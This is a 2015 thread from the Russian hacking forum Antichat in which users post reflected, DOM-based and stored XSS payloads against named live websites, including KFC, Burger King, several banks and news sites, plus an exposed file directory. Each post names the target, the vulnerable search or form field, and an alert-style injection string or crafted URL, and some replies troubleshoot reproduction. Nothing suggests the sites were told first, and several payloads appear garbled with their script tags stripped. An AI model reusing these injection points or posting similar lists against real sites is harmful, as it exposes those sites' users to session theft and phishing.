HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #171  
Старый 30.08.2015, 21:21
DDShadoww
Guest
Сообщений: n/a
Провел на форуме:
2236

Репутация: 2
По умолчанию

XSS на мобильной версии сайта KFC

target:m.kfc.ru/career-vacancies/member

type: XSS-Reflected


В поля Фамилия, имя вводим

Код:
Code:
">alert("XSS")
и так же в поле Мобильный телефон
 
Ответить с цитированием

  #172  
Старый 30.08.2015, 22:12
DDShadoww
Guest
Сообщений: n/a
Провел на форуме:
2236

Репутация: 2
По умолчанию

BurgerKing

target: burgerking.ru

type: XSS-Reflected


В поля поиска

Код:
Code:
">alert(1)
 
Ответить с цитированием

  #173  
Старый 02.09.2015, 14:19
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Target: _ttp://www.edelws.ru

Type : XSS-Reflected(вбивается под поисковик .)

Код:
Code:
">alert("WH")
 
Ответить с цитированием

  #174  
Старый 02.09.2015, 14:38
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию

Цитата:
Сообщение от DDShadoww  
DDShadoww said:

target:3dnews.ru

type: XSS-Reflected

В поля поиска

Код:
Code:
alert(1)

это DOM based XSS

работает даже в хроме

Код:
Code:
http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0
 
Ответить с цитированием

  #175  
Старый 02.09.2015, 14:44
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от psihoz26  
psihoz26 said:

это DOM based XSS
работает даже в хроме
Код:
Code:
http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0
страннло что у меня не работает, может хром старый?
 
Ответить с цитированием

  #176  
Старый 02.09.2015, 15:10
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

страннло что у меня не работает, может хром старый?
Введи в поиск и нажми значок поиска alert(1)

 
Ответить с цитированием

  #177  
Старый 07.09.2015, 22:31
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Код:
Code:
http://www.militarynews.ru/default.asp?SStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
пассивно-активная XSS.

Интересно то, что если после перехода по ссылке попробовать авторизоваться, то окошко авторизации выскакивает во второй раз.
 
Ответить с цитированием

  #178  
Старый 08.09.2015, 10:02
DDShadoww
Guest
Сообщений: n/a
Провел на форуме:
2236

Репутация: 2
По умолчанию

Target: allbanks.ru

Type: Reflected

В поля поиска -

Код:
Code:
">alert(1)


Target:
capitalbank.kz/oldsite/

Type: Reflected

В поля поиска -

Код:
Code:
">alert(1)
Target: asbank.ru/

Type: Reflected

В поля поиска -

Код:
Code:
">alert(1)
 
Ответить с цитированием

  #179  
Старый 09.09.2015, 18:30
d3q
Guest
Сообщений: n/a
Провел на форуме:
1698

Репутация: 0
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Target: _ttp://www.edelws.ru
Type : XSS-Reflected(вбивается под поисковик .)

Код:
Code:
"<>script>alert("WH")

Видимо опечатка - второй и третий символ надо поменять местами
Код:
Code:
">alert("WH")
 
Ответить с цитированием

  #180  
Старый 12.09.2015, 20:53
DDShadoww
Guest
Сообщений: n/a
Провел на форуме:
2236

Репутация: 2
По умолчанию

Target: foto7an.se

Type:Reflected and Stored

Весь в XSS. И еше бонус - foto7an.se/files/
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ